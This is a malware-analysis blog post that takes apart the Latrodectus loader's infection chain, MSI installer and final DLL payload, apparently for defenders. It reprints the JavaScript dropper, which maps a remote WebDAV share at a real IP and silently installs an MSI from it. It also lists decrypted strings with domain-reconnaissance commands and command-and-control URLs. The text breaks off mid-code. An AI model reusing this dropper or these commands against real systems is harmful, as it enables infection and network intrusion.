<!doctype html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><style>:root{--accent-color:#FF4D4D}</style><title>Malware Analysis Article</title>
<meta name=description content="Unlocking the Secrets of Software: A Journey into Reverse Engineering"><meta name=keywords content='blog,gokarna,hugo,Malware Analysis'><meta property="og:url" content="https://Cy83rTR0n.github.io/website/posts/latredocus/"><meta property="og:type" content="website"><meta property="og:title" content="Malware Analysis Article"><meta property="og:description" content="Unlocking the Secrets of Software: A Journey into Reverse Engineering"><meta property="og:image" content="https://images.unsplash.com/photo-1544890225-2f3faec4cd60?auto=format&amp;fit=crop&amp;q=60&amp;w=500&amp;ixlib=rb-4.0.3&amp;ixid=M3wxMjA3fDB8MHxzZWFyY2h8N3x8aGFja2VyfGVufDB8fDB8fHww"><meta property="og:image:secure_url" content="https://images.unsplash.com/photo-1544890225-2f3faec4cd60?auto=format&amp;fit=crop&amp;q=60&amp;w=500&amp;ixlib=rb-4.0.3&amp;ixid=M3wxMjA3fDB8MHxzZWFyY2h8N3x8aGFja2VyfGVufDB8fDB8fHww"><meta name=twitter:card content="summary_large_image"><meta name=twitter:title content="Malware Analysis Article"><meta name=twitter:description content="Unlocking the Secrets of Software: A Journey into Reverse Engineering"><meta property="twitter:domain" content="https://Cy83rTR0n.github.io/website/posts/latredocus/"><meta property="twitter:url" content="https://Cy83rTR0n.github.io/website/posts/latredocus/"><meta name=twitter:image content="https://images.unsplash.com/photo-1544890225-2f3faec4cd60?auto=format&amp;fit=crop&amp;q=60&amp;w=500&amp;ixlib=rb-4.0.3&amp;ixid=M3wxMjA3fDB8MHxzZWFyY2h8N3x8aGFja2VyfGVufDB8fDB8fHww"><link rel=canonical href=https://Cy83rTR0n.github.io/website/posts/latredocus/><link rel=stylesheet type=text/css href=/website/css/normalize.min.css media=print><link rel=stylesheet type=text/css href=/website/css/main.min.css><link id=dark-theme rel=stylesheet href=/website/css/dark.min.css><script src=/website/js/bundle.min.fbe2f55794ed6ded1573152a130784ee5cb022de9676b19dd37d7559ee6f6fc6.js integrity="sha256-++L1V5Ttbe0VcxUqEweE7lywIt6WdrGd0311We5vb8Y="></script><link rel=stylesheet href=https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.css integrity=sha384-Xi8rHCmBmhbuyyhbI88391ZKP2dmfnOl4rT9ZfRI7mLTdk1wblIUnrIq35nqwEvC crossorigin=anonymous><script defer src=https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.js integrity=sha384-X/XCfMm41VSsqRNQgDerQczD69XqmjOOOwYQvr/uuC+j4OPoNhVgjdGFwhvN02Ja crossorigin=anonymous></script><script defer src=https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/contrib/auto-render.min.js integrity=sha384-+XBljXPPiv+OzfbB3cVmLHf4hdUFHlWNZN5spNQ7rmHTXpd7WvJum6fIACpNNfIR crossorigin=anonymous></script><script>document.addEventListener("DOMContentLoaded",function(){renderMathInElement(document.body,{delimiters:[{left:"$$",right:"$$",display:!0},{left:"$",right:"$",display:!1}],throwOnError:!1})})</script></head><body><script type=text/javascript>setThemeByUserPref()</script><header class=header><nav class=header-nav><div class=avatar><a href=https://Cy83rTR0n.github.io/website/><img src='https://images.unsplash.com/photo-1544890225-2f3faec4cd60?auto=format&amp;fit=crop&amp;q=60&amp;w=500&amp;ixlib=rb-4.0.3&amp;ixid=M3wxMjA3fDB8MHxzZWFyY2h8N3x8aGFja2VyfGVufDB8fDB8fHww' alt=avatar></a></div><div class=nav-title><a class=nav-brand href=https://Cy83rTR0n.github.io/website/>Reverse Engineering Blog</a></div><div class=nav-links><div class=nav-link><a href=https://Cy83rTR0n.github.io/website/><span data-feather=home></span> Home</a></div><div class=nav-link><a href=https://Cy83rTR0n.github.io/website/posts/><span data-feather=book></span> Posts</a></div><div class=nav-link><a href=https://Cy83rTR0n.github.io/website/projects/><span data-feather=code></span> Projects</a></div><div class=nav-link><a href=https://Cy83rTR0n.github.io/website/tags/><span data-feather=tag></span> Tags</a></div><div class=nav-link><a href=https://github.com/Cy83rTR0n><span data-feather=github></span></a></div><div class=nav-link><a href=https://www.reddit.com/user/Cy83rTr0n/><span data-feather=rss></span></a></div><span class=nav-icons-divider></span><div class="nav-link dark-theme-toggle"><span id=dark-theme-toggle-screen-reader-target class=sr-only></span>
<a><span id=theme-toggle-icon data-feather=moon></span></a></div><div class=nav-link id=hamburger-menu-toggle><span id=hamburger-menu-toggle-screen-reader-target class=sr-only>menu</span>
<a><span data-feather=menu></span></a></div><ul class="nav-hamburger-list visibility-hidden"><li class=nav-item><a href=https://Cy83rTR0n.github.io/website/><span data-feather=home></span> Home</a></li><li class=nav-item><a href=https://Cy83rTR0n.github.io/website/posts/><span data-feather=book></span> Posts</a></li><li class=nav-item><a href=https://Cy83rTR0n.github.io/website/projects/><span data-feather=code></span> Projects</a></li><li class=nav-item><a href=https://Cy83rTR0n.github.io/website/tags/><span data-feather=tag></span> Tags</a></li><li class=nav-item><a href=https://github.com/Cy83rTR0n><span data-feather=github></span></a></li><li class=nav-item><a href=https://www.reddit.com/user/Cy83rTr0n/><span data-feather=rss></span></a></li><li class="nav-item dark-theme-toggle"><span id=dark-theme-toggle-screen-reader-target class=sr-only>theme</span>
<a><span id=theme-toggle-icon data-feather=moon></span></a></li></ul></div></nav></header><main id=content><div class="post container"><div class=post-header-section><h1>Malware Analysis Article</h1><small role=doc-subtitle></small><p class=post-date>July 18, 2024</p><ul class=post-tags><li class=post-tag><a href=https://Cy83rTR0n.github.io/website/tags/malware-analysis>Malware Analysis</a></li></ul></div><div class=post-content><p><h1 id=latredocus-exposed-unraveling-the-new-cyber-threat>Latredocus Exposed: Unraveling the New Cyber Threat</h1><h2 id=overview>Overview</h2><p>In this report, we delve into the intricate details of Latrodectus, a new and sophisticated malware loader that has surfaced in the cybersecurity landscape. First identified in phishing campaigns in early March 2024, Latrodectus is believed to be the successor to the notorious IcedID malware. This report aims to provide a comprehensive analysis of Latrodectus, including its infection chain, capabilities, and the broader implications for cybersecurity.</p><h2 id=infection-chain-and-distribution>Infection Chain and Distribution</h2><p>The initial discovery of Latrodectus was made through a surge in email phishing campaigns. These campaigns commonly use oversized JavaScript files that exploit Windows Management Instrumentation (WMI) to invoke msiexec.exe and install a malicious MSI file from a WEBDAV share. This infection chain is a sophisticated method that leverages well-known system utilities to avoid detection.</p><h2 id=technical-analysis>Technical Analysis</h2><p>Latrodectus exemplifies the evolution of malware sophistication, integrating advanced techniques to infiltrate, persist, and evade detection on compromised systems. This technical analysis delves into the specifics of its infection chain, operational capabilities, evasion strategies, persistence mechanisms, and command-and-control (C2) communication protocols. Understanding these facets is crucial for cybersecurity professionals aiming to effectively detect, analyze, and counteract the threat posed by Latrodectus.</p><h3 id=stage--1>Stage : 1</h3><h4 id=javascript-payload>Javascript Payload</h4><pre tabindex=0><code>MD5 hash : 7d42412a93368417fed25f581c536e5a
</code></pre><p>This JavaScript code performs network drive mapping, installs an MSI package, and can execute additional embedded code. Here&rsquo;s a breakdown:</p><h4 id=key-variables-and-function>Key Variables and Function</h4><ol><li><p><strong>Setup Objects:</strong></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#66d9ef>var</span> <span style=color:#a6e22e>network</span> <span style=color:#f92672>=</span> <span style=color:#66d9ef>new</span> <span style=color:#a6e22e>ActiveXObject</span>(<span style=color:#e6db74>&#34;WScript.Network&#34;</span>);
</span></span><span style=display:flex><span><span style=color:#66d9ef>var</span> <span style=color:#a6e22e>wmi</span> <span style=color:#f92672>=</span> <span style=color:#a6e22e>GetObject</span>(<span style=color:#e6db74>&#34;winmgmts:\\\\.\\root\\cimv2&#34;</span>);
</span></span><span style=display:flex><span><span style=color:#66d9ef>var</span> <span style=color:#a6e22e>attempt</span> <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>;
</span></span><span style=display:flex><span><span style=color:#66d9ef>var</span> <span style=color:#a6e22e>connected</span> <span style=color:#f92672>=</span> <span style=color:#66d9ef>false</span>;
</span></span></code></pre></div><p>The above code snippet is trying to interact with network resources using Windows Script Host&rsquo;s network capabilities through ActiveXObject. It also uses WMI to manage system information, trying to check for connectivity by setting a flag after attempting a connection.</p></li><li><p><strong>Check if Drive is Mapped:</strong></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#66d9ef>function</span> <span style=color:#a6e22e>isDriveMapped</span>(<span style=color:#a6e22e>letter</span>) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>var</span> <span style=color:#a6e22e>drives</span> <span style=color:#f92672>=</span> <span style=color:#a6e22e>network</span>.<span style=color:#a6e22e>EnumNetworkDrives</span>();
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>for</span> (<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>i</span> <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>; <span style=color:#a6e22e>i</span> <span style=color:#f92672>&lt;</span> <span style=color:#a6e22e>drives</span>.<span style=color:#a6e22e>length</span>; <span style=color:#a6e22e>i</span> <span style=color:#f92672>+=</span> <span style=color:#ae81ff>2</span>) {
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>drives</span>.<span style=color:#a6e22e>Item</span>(<span style=color:#a6e22e>i</span>) <span style=color:#f92672>===</span> <span style=color:#a6e22e>letter</span>) {
</span></span><span style=display:flex><span>            <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>true</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>false</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>The code snippet uses <code>EnumNetworkDrives()</code> to check if a specific drive letter (<code>letter</code>) is currently mapped on the system. This method is commonly utilized by malware to identify network resources accessible from an infected machine. By determining mapped drives, malware can potentially spread across network shares, access sensitive data, or execute further malicious activities within the network environment.</p></li></ol><h4 id=drive-mapping-logic>Drive Mapping Logic</h4><ol start=3><li><p><strong>Try Mapping Drives from &lsquo;Z&rsquo; to &lsquo;A&rsquo;:</strong></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#66d9ef>for</span> (<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>driveLetter</span> <span style=color:#f92672>=</span> <span style=color:#ae81ff>90</span>; <span style=color:#a6e22e>driveLetter</span> <span style=color:#f92672>&gt;=</span> <span style=color:#ae81ff>65</span> <span style=color:#f92672>&amp;&amp;</span> <span style=color:#f92672>!</span><span style=color:#a6e22e>connected</span>; <span style=color:#a6e22e>driveLetter</span><span style=color:#f92672>--</span>) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>var</span> <span style=color:#a6e22e>letter</span> <span style=color:#f92672>=</span> String.<span style=color:#a6e22e>fromCharCode</span>(<span style=color:#a6e22e>driveLetter</span>) <span style=color:#f92672>+</span> <span style=color:#e6db74>&#34;:&#34;</span>;
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> (<span style=color:#f92672>!</span><span style=color:#a6e22e>isDriveMapped</span>(<span style=color:#a6e22e>letter</span>)) {
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>try</span> {
</span></span><span style=display:flex><span>            <span style=color:#a6e22e>network</span>.<span style=color:#a6e22e>MapNetworkDrive</span>(<span style=color:#a6e22e>letter</span>, <span style=color:#e6db74>&#34;\\\\95.164.3.171@80\\share\\&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#a6e22e>connected</span> <span style=color:#f92672>=</span> <span style=color:#66d9ef>true</span>;
</span></span><span style=display:flex><span>            <span style=color:#66d9ef>break</span>;
</span></span><span style=display:flex><span>        } <span style=color:#66d9ef>catch</span> (<span style=color:#a6e22e>e</span>) {
</span></span><span style=display:flex><span>            <span style=color:#a6e22e>attempt</span><span style=color:#f92672>++</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>This snippet attempts to map network drives from Z: to A: (corresponding to drive letters 90 to 65) until it successfully maps to &ldquo;\95.164.3.171@80\share" or exhausts all attempts. It uses <code>MapNetworkDrive()</code> to connect to a remote share, potentially allowing malware to access or spread across network resources, a common tactic for <code>lateral movement</code> in cyberattacks.</p></li><li><p><strong>Fallback Mapping with <code>net use</code>:</strong></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#66d9ef>if</span> (<span style=color:#f92672>!</span><span style=color:#a6e22e>connected</span> <span style=color:#f92672>&amp;&amp;</span> <span style=color:#a6e22e>attempt</span> <span style=color:#f92672>&gt;</span> <span style=color:#ae81ff>5</span>) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>var</span> <span style=color:#a6e22e>command</span> <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;net use &#39;</span> <span style=color:#f92672>+</span> <span style=color:#a6e22e>letter</span> <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39; \\\\95.164.3.171@80\\share\\ /persistent:no&#39;</span>;
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>wmi</span>.<span style=color:#a6e22e>Get</span>(<span style=color:#e6db74>&#34;Win32_Process&#34;</span>).<span style=color:#a6e22e>Create</span>(<span style=color:#a6e22e>command</span>, <span style=color:#66d9ef>null</span>, <span style=color:#66d9ef>null</span>, <span style=color:#66d9ef>null</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>var</span> <span style=color:#a6e22e>startTime</span> <span style=color:#f92672>=</span> <span style=color:#66d9ef>new</span> Date();
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>while</span> (<span style=color:#66d9ef>new</span> Date() <span style=color:#f92672>-</span> <span style=color:#a6e22e>startTime</span> <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>3000</span>) {} <span style=color:#75715e>// Wait 3 seconds
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>connected</span> <span style=color:#f92672>=</span> <span style=color:#a6e22e>isDriveMapped</span>(<span style=color:#a6e22e>letter</span>);
</span></span><span style=display:flex><span>}
</span></span></code></pre></div></li></ol><p>The above JavaScript snippet verifies whether the network drive connection failed and if the number of attempts exceeds 5. If these conditions are met, it utilizes WMI (<code>Win32_Process</code>) to execute a command (<code>net use</code>) that maps the network drive <code>letter</code> to &ldquo;\95.164.3.171@80\share" without persistence. Following execution, it includes a 3-second wait period to confirm the successful mapping of the drive (<code>isDriveMapped(letter)</code> returning true).</p><h4 id=msi-installation>MSI Installation</h4><ol start=5><li><strong>Install MSI if Connected:</strong><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>connected</span>) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>var</span> <span style=color:#a6e22e>installCommand</span> <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;msiexec.exe /i \\\\95.164.3.171@80\\share\\cisa.msi /qn&#39;</span>;
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>wmi</span>.<span style=color:#a6e22e>Get</span>(<span style=color:#e6db74>&#34;Win32_Process&#34;</span>).<span style=color:#a6e22e>Create</span>(<span style=color:#a6e22e>installCommand</span>, <span style=color:#66d9ef>null</span>, <span style=color:#66d9ef>null</span>, <span style=color:#66d9ef>null</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>try</span> {
</span></span><span style=display:flex><span>        <span style=color:#a6e22e>network</span>.<span style=color:#a6e22e>RemoveNetworkDrive</span>(<span style=color:#a6e22e>letter</span>, <span style=color:#66d9ef>true</span>, <span style=color:#66d9ef>true</span>);
</span></span><span style=display:flex><span>    } <span style=color:#66d9ef>catch</span> (<span style=color:#a6e22e>e</span>) {}
</span></span><span style=display:flex><span>} <span style=color:#66d9ef>else</span> {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>WScript</span>.<span style=color:#a6e22e>Echo</span>(<span style=color:#e6db74>&#34;Failed.&#34;</span>);
</span></span><span style=display:flex><span>}
</span></span></code></pre></div>The important part of the code snippet is the execution of the <code>msiexec.exe</code> command (<code>'msiexec.exe /i \\\\95.164.3.171@80\\share\\cisa.msi /qn'</code>) using WMI (<code>Win32_Process</code>). This command attempts to silently install an MSI package (<code>cisa.msi</code>) located on a remote share (<code>\\95.164.3.171@80\share</code>). If <code>connected</code> is true (indicating successful network drive mapping), the installation proceeds; otherwise, an error message is echoed via <code>WScript.Echo("Failed.")</code>.</li></ol><h3 id=stage--2>Stage : 2</h3><h4 id=basic-static-analysis-of-the-msi-file>Basic Static Analysis of the MSI File</h4><pre tabindex=0><code>MD5 hash : c4e8f3e02fd50a4051f11048f1355726
</code></pre><p>As previously mentioned, the next phase of the attack involves the deployment of a malicious .msi file on the victim&rsquo;s machine. To unveil the intricacies of this payload, we turn to Orca, a powerful tool for dissecting MSI files. What we discovered through this analysis is both alarming and fascinating.</p><p>When we cracked open the .msi file using Orca, we found a treasure trove of malicious components carefully hidden within. This file is not just a simple installer; it’s a cleverly disguised arsenal designed to establish a foothold on the target system.</p><p><img src=https://hackmd.io/_uploads/B1ODxL4OA.png alt=image></p><p><img src=https://hackmd.io/_uploads/rkcsgIE_0.png alt=image></p><p>Now that we have gained some initial insights into the DLL, our next step involves a deeper dynamic analysis by executing the installer.</p><h4 id=basic-dynamic-analysis-of-the-msi-file>Basic Dynamic Analysis of the MSI File</h4><p>Running the installer and closely monitoring its behavior with ProcMon provides valuable insights and observations.
<img src=https://hackmd.io/_uploads/B14W9uEuA.png alt=image></p><p><img src=https://hackmd.io/_uploads/H1_4cu4_C.png alt=image></p><p><img src=https://hackmd.io/_uploads/rk1Zj_EuA.png alt=image></p><h3 id=stage--3>Stage : 3</h3><h4 id=analyzing-the-payload-falcondll-behavior-under-the-debugger>Analyzing the Payload: Falcon.dll Behavior Under the Debugger</h4><p>In our previous section, we explored the installation process of the .sil installer and observed that falcon.dll, upon initial execution, duplicates itself, enabling the dropped DLL to function identically to the original. Now, we proceed to dissect falcon.dll using a debugger to uncover its behavior and functionalities in greater detail.
<img src=https://hackmd.io/_uploads/Hkz2AySdC.png alt=image></p><p><img src=https://hackmd.io/_uploads/rJY6dlrOR.png alt=image></p><p>We observe that a PE file is loaded into memory during the dump. We extract the file from the dump and proceed with our analysis to reverse engineer the final stage.</p><h3 id=stage--4>Stage : 4</h3><h4 id=static-analysis-of-the-payload----payloaddll>Static Analysis of the payload : - Payload.dll</h4><pre tabindex=0><code>MD5 hash : 703ffdc708f1f0779bb0f6da1b8cbc9a
file type : PE32+ executable (DLL) (GUI) x86-64, for MS Windows
</code></pre><p>Upon encountering gibberish output from normal string analysis, we opted to employ <code>FLOSS</code> for deeper insights into the binary&rsquo;s string contents.
It is generally observed that malware authors tend to use certain known or custom encryption schemes to hide thge actual activity from analysts and make the process of analysis a tedious process.
However we have tools like <code>FLOSS</code> which uses advanced static analysis techniques to deobfuscate the strings.</p><h5 id=floss-strings>FLOSS STRINGS</h5><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>INFO: floss.results: LogonTrigger
</span></span><span style=display:flex><span>INFO: floss.results: &lt;!DOCTYPE
</span></span><span style=display:flex><span>INFO: floss.results: /c net group <span style=color:#e6db74>&#34;Domain Admins&#34;</span> /domain
</span></span><span style=display:flex><span>INFO: floss.results: C:<span style=color:#ae81ff>\W</span>indows<span style=color:#ae81ff>\S</span>ystem32<span style=color:#ae81ff>\c</span>md.exe
</span></span><span style=display:flex><span>INFO: floss.results: &amp;systeminfo<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#e6db74>&#34;pid&#34;</span>:
</span></span><span style=display:flex><span>INFO: floss.results: Local AppData
</span></span><span style=display:flex><span>INFO: floss.results: &amp;desklinks<span style=color:#f92672>=[</span>
</span></span><span style=display:flex><span>INFO: floss.results: Mozilla/4.0 <span style=color:#f92672>(</span>compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>INFO: floss.results: %d.dat
</span></span><span style=display:flex><span>INFO: floss.results: COMMAND
</span></span><span style=display:flex><span>INFO: floss.results: %s%d.dll
</span></span><span style=display:flex><span>INFO: floss.results: %s%s
</span></span><span style=display:flex><span>INFO: floss.results: /c nltest /domain_trusts /all_trusts
</span></span><span style=display:flex><span>INFO: floss.results: Content-Type: application/x-www-form-urlencoded
</span></span><span style=display:flex><span>INFO: floss.results: AppData
</span></span><span style=display:flex><span>INFO: floss.results: /c whoami /groups
</span></span><span style=display:flex><span>INFO: floss.results: /c ipconfig /all
</span></span><span style=display:flex><span>INFO: floss.results: &amp;net_config_ws<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: %s<span style=color:#ae81ff>\%</span>s
</span></span><span style=display:flex><span>INFO: floss.results: URLS|%d|%s
</span></span><span style=display:flex><span>INFO: floss.results: Software<span style=color:#ae81ff>\M</span>icrosoft<span style=color:#ae81ff>\W</span>indows<span style=color:#ae81ff>\C</span>urrentVersion<span style=color:#ae81ff>\E</span>xplorer<span style=color:#ae81ff>\S</span>hell Folders
</span></span><span style=display:flex><span>INFO: floss.results: Littlehw
</span></span><span style=display:flex><span>INFO: floss.results: :wtfbbq
</span></span><span style=display:flex><span>INFO: floss.results: &amp;proclist<span style=color:#f92672>=[</span>
</span></span><span style=display:flex><span>INFO: floss.results: &amp;net_view_all<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: .dll
</span></span><span style=display:flex><span>INFO: floss.results: /Node:localhost /Namespace:<span style=color:#ae81ff>\r</span>oot<span style=color:#ae81ff>\S</span>ecurityCenter2 Path AntiVirusProduct Get * /Format:List
</span></span><span style=display:flex><span>INFO: floss.results: Updater
</span></span><span style=display:flex><span>INFO: floss.results: ERROR
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#e6db74>&#34;proc&#34;</span>:
</span></span><span style=display:flex><span>INFO: floss.results: &amp;domain_trusts<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: PT0S
</span></span><span style=display:flex><span>INFO: floss.results: .exe
</span></span><span style=display:flex><span>INFO: floss.results: Desktop
</span></span><span style=display:flex><span>INFO: floss.results: /c net view /all /domain
</span></span><span style=display:flex><span>INFO: floss.results: C:<span style=color:#ae81ff>\W</span>indows<span style=color:#ae81ff>\S</span>ystem32<span style=color:#ae81ff>\w</span>bem<span style=color:#ae81ff>\w</span>mic.exe
</span></span><span style=display:flex><span>INFO: floss.results: POST
</span></span><span style=display:flex><span>INFO: floss.results: /files/
</span></span><span style=display:flex><span>INFO: floss.results: &amp;computername<span style=color:#f92672>=</span>%s
</span></span><span style=display:flex><span>INFO: floss.results: files/bp.dat
</span></span><span style=display:flex><span>INFO: floss.results: %04X%04X%04X%04X%08X%04X
</span></span><span style=display:flex><span>INFO: floss.results: URLS
</span></span><span style=display:flex><span>INFO: floss.results: /c systeminfo
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#ae81ff>\u</span>pdate_data.dat
</span></span><span style=display:flex><span>INFO: floss.results: https://aytobusesre.com/live/
</span></span><span style=display:flex><span>INFO: floss.results: &amp;net_wmic_av<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: Custom_update
</span></span><span style=display:flex><span>INFO: floss.results: runnung
</span></span><span style=display:flex><span>INFO: floss.results: &amp;net_group<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: CLEARURL
</span></span><span style=display:flex><span>INFO: floss.results: /c net config workstation
</span></span><span style=display:flex><span>INFO: floss.results: Startup
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#e6db74>&#34;subproc&#34;</span>: <span style=color:#f92672>[</span>
</span></span><span style=display:flex><span>INFO: floss.results: init -<span style=color:#f92672>=</span><span style=color:#e6db74>&#34;%s\%s&#34;</span>
</span></span><span style=display:flex><span>INFO: floss.results: &amp;domain_trusts_all<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: %s<span style=color:#ae81ff>\%</span>d.dll
</span></span><span style=display:flex><span>INFO: floss.results: &amp;ipconfig<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: /c net view /all
</span></span><span style=display:flex><span>INFO: floss.results: html
</span></span><span style=display:flex><span>INFO: floss.results: https://scifimond.com/live/
</span></span><span style=display:flex><span>INFO: floss.results: C:<span style=color:#ae81ff>\W</span>INDOWS<span style=color:#ae81ff>\S</span>YSTEM32<span style=color:#ae81ff>\r</span>undll32.exe %s,%s
</span></span><span style=display:flex><span>INFO: floss.results: &amp;domain<span style=color:#f92672>=</span>%s
</span></span><span style=display:flex><span>INFO: floss.results: rundll32.exe
</span></span><span style=display:flex><span>INFO: floss.results: front
</span></span><span style=display:flex><span>INFO: floss.results: /c nltest /domain_trusts
</span></span><span style=display:flex><span>INFO: floss.results: Personal
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#ae81ff>12345</span>
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#ae81ff>\R</span>egistry<span style=color:#ae81ff>\M</span>achine<span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>INFO: floss.results: %s%d.exe
</span></span><span style=display:flex><span>INFO: floss.results: &amp;whoami_group<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: /c wmic.exe /node:localhost /namespace:<span style=color:#ae81ff>\r</span>oot<span style=color:#ae81ff>\S</span>ecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName <span style=color:#f92672>||</span> echo No Antivir
</span></span><span style=display:flex><span>INFO: floss.results: wmic
</span></span><span style=display:flex><span>INFO: floss.results: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
</span></span><span style=display:flex><span>INFO: floss.results: <span style=color:#e6db74>&#34;%s&#34;</span>, %s %s
</span></span><span style=display:flex><span>INFO: floss.results: C:<span style=color:#ae81ff>\W</span>INDOWS<span style=color:#ae81ff>\S</span>YSTEM32<span style=color:#ae81ff>\r</span>undll32.exe %s
</span></span><span style=display:flex><span>INFO: floss.results: Update_%x
</span></span><span style=display:flex><span>INFO: floss.results: &amp;net_view_all_domain<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>INFO: floss.results: %04X%04X%04X%04X%08X%04X
</span></span></code></pre></div><p>From the analysis above, several key insights can be drawn regarding the LATREDOCUS malware:</p><ol><li><p><strong>Custom String Decryption Routine</strong>: The presence of a custom string decryption routine indicates sophisticated obfuscation techniques employed by LATREDOCUS to load essential strings dynamically. This method enhances resilience against static analysis, complicating detection and analysis efforts.</p></li><li><p><strong>Decrypted Command Strings</strong>: The decrypted strings reveal a repertoire of commands executed by LATREDOCUS. These commands are pivotal in understanding the malware&rsquo;s operational capabilities, encompassing various malicious activities such as data exfiltration, system manipulation, and possibly command and control (C2) communication.</p></li><li><p><strong>Domain Names for C2 Communication</strong>: Identification of domain names embedded within the decrypted strings provides crucial intelligence on LATREDOCUS&rsquo;s communication channels with its command and control infrastructure. This insight is instrumental in tracking and mitigating the malware&rsquo;s network-based activities.</p></li></ol><p>This analysis underscores the malware&rsquo;s sophisticated design and operational complexity, highlighting the importance of advanced techniques and tools in unraveling its malicious intent and mitigating its impact effectively.</p><h3 id=delving-into-payloaddll-reverse-engineering-and-analysis>Delving into Payload.dll: Reverse Engineering and Analysis</h3><p>In this phase, our focus shifts to the thorough reverse engineering and analysis of the payload.dll extracted from the preceding stages of our investigation. This pivotal component promises deeper insights into the inner workings of LATREDOCUS malware.</p><p><img src=https://hackmd.io/_uploads/SJVTYWBuC.png alt=image></p><p>we open the run function in IDA and start looking what all the file is trying to do!!.</p><p><img src=https://hackmd.io/_uploads/HkcA5ZS_0.png alt=image></p><p>After renaming functions in IDA and leveraging the hashDB plugin, we have identified the following critical functions within Payload.dll. Let&rsquo;s delve into their purpose:</p><p>a. <strong>resolve_kernel_32_dll</strong>: This function dynamically resolves kernel32.dll, enabling access to essential Windows API functions crucial for the malware&rsquo;s operation.</p><p>b. <strong>resolve_ntdll_dll</strong>: This function dynamically resolves ntdll.dll, facilitating access to low-level system functions necessary for advanced system interactions.</p><p>c. <strong>resolve_kernel32_functions</strong>: This function dynamically resolves specific functions within kernel32.dll, optimizing the malware&rsquo;s capability to interact with the operating system.</p><p>Additionally, other functions within the DLL focus on dynamically resolving various APIs and essential DLLs, enhancing the malware&rsquo;s versatility in executing diverse functionalities across compromised systems.</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>Function decrypt_string(data_enc: byte array, xor_key: integer) <span style=color:#f92672>-&gt;</span> string:
